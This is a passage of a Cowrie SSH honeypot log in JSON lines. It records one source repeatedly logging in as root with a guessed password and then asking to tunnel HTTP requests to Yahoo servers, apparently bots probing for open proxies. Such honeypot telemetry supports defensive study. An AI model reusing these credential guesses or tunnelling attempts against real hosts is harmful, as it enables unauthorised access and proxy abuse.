xchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.906187Z","src_ip":"213.209.150.239","session":"e8c2b62c29a6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.188286Z","src_ip":"213.209.150.239","session":"e8c2b62c29a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":2178,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:2178","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.245677Z","session":"e8c2b62c29a6"}
{"eventid":"cowrie.session.connect","src_ip":"120.79.98.154","src_port":44614,"dst_ip":"1.2.3.4","dst_port":22,"session":"76b9300de415","protocol":"ssh","message":"New connection: 120.79.98.154:44614 (1.2.3.4:22) [session: 76b9300de415]","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.261522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.262408Z","src_ip":"120.79.98.154","session":"76b9300de415"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.302273Z","src_ip":"213.209.150.239","session":"e8c2b62c29a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":17528,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17528","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.459023Z","session":"e8c2b62c29a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.515770Z","src_ip":"213.209.150.239","session":"e8c2b62c29a6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.573151Z","src_ip":"213.209.150.239","session":"e8c2b62c29a6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63555,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1fa45e82f98","protocol":"ssh","message":"New connection: 213.209.150.239:63555 (1.2.3.4:22) [session: d1fa45e82f98]","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.628635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.629735Z","src_ip":"213.209.150.239","session":"d1fa45e82f98"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.686497Z","src_ip":"213.209.150.239","session":"d1fa45e82f98"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:16.968703Z","src_ip":"213.209.150.239","session":"d1fa45e82f98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":27661,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:27661","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.027116Z","session":"d1fa45e82f98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.083838Z","src_ip":"213.209.150.239","session":"d1fa45e82f98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":28774,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28774","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.238988Z","session":"d1fa45e82f98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.295699Z","src_ip":"213.209.150.239","session":"d1fa45e82f98"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.353323Z","src_ip":"213.209.150.239","session":"d1fa45e82f98"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63613,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef9f541cf9ba","protocol":"ssh","message":"New connection: 213.209.150.239:63613 (1.2.3.4:22) [session: ef9f541cf9ba]","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.408706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.409624Z","src_ip":"213.209.150.239","session":"ef9f541cf9ba"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.466086Z","src_ip":"213.209.150.239","session":"ef9f541cf9ba"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.747612Z","src_ip":"213.209.150.239","session":"ef9f541cf9ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":4351,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4351","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.804869Z","session":"ef9f541cf9ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:17.861417Z","src_ip":"213.209.150.239","session":"ef9f541cf9ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":6145,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6145","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.014850Z","session":"ef9f541cf9ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.071371Z","src_ip":"213.209.150.239","session":"ef9f541cf9ba"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.128771Z","src_ip":"213.209.150.239","session":"ef9f541cf9ba"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63660,"dst_ip":"1.2.3.4","dst_port":22,"session":"026742b53556","protocol":"ssh","message":"New connection: 213.209.150.239:63660 (1.2.3.4:22) [session: 026742b53556]","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.175136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.176532Z","src_ip":"213.209.150.239","session":"026742b53556"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.223738Z","src_ip":"213.209.150.239","session":"026742b53556"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.458611Z","src_ip":"213.209.150.239","session":"026742b53556"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":18017,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:18017","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.506555Z","session":"026742b53556"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.553989Z","src_ip":"213.209.150.239","session":"026742b53556"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":21947,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:21947","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.689533Z","session":"026742b53556"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.736689Z","src_ip":"213.209.150.239","session":"026742b53556"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.785609Z","src_ip":"213.209.150.239","session":"026742b53556"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63706,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ce159c53bd4","protocol":"ssh","message":"New connection: 213.209.150.239:63706 (1.2.3.4:22) [session: 6ce159c53bd4]","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.831656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.832507Z","src_ip":"213.209.150.239","session":"6ce159c53bd4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:18.879808Z","src_ip":"213.209.150.239","session":"6ce159c53bd4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.115031Z","src_ip":"213.209.150.239","session":"6ce159c53bd4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":26185,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:26185","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.162919Z","session":"6ce159c53bd4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.210177Z","src_ip":"213.209.150.239","session":"6ce159c53bd4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":8560,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:8560","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.345601Z","session":"6ce159c53bd4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.392758Z","src_ip":"213.209.150.239","session":"6ce159c53bd4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.440725Z","src_ip":"213.209.150.239","session":"6ce159c53bd4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63752,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef40e18e7c44","protocol":"ssh","message":"New connection: 213.209.150.239:63752 (1.2.3.4:22) [session: ef40e18e7c44]","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.496687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.497394Z","src_ip":"213.209.150.239","session":"ef40e18e7c44"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.554588Z","src_ip":"213.209.150.239","session":"ef40e18e7c44"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.836352Z","src_ip":"213.209.150.239","session":"ef40e18e7c44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":23980,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:23980","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.897496Z","session":"ef40e18e7c44"}
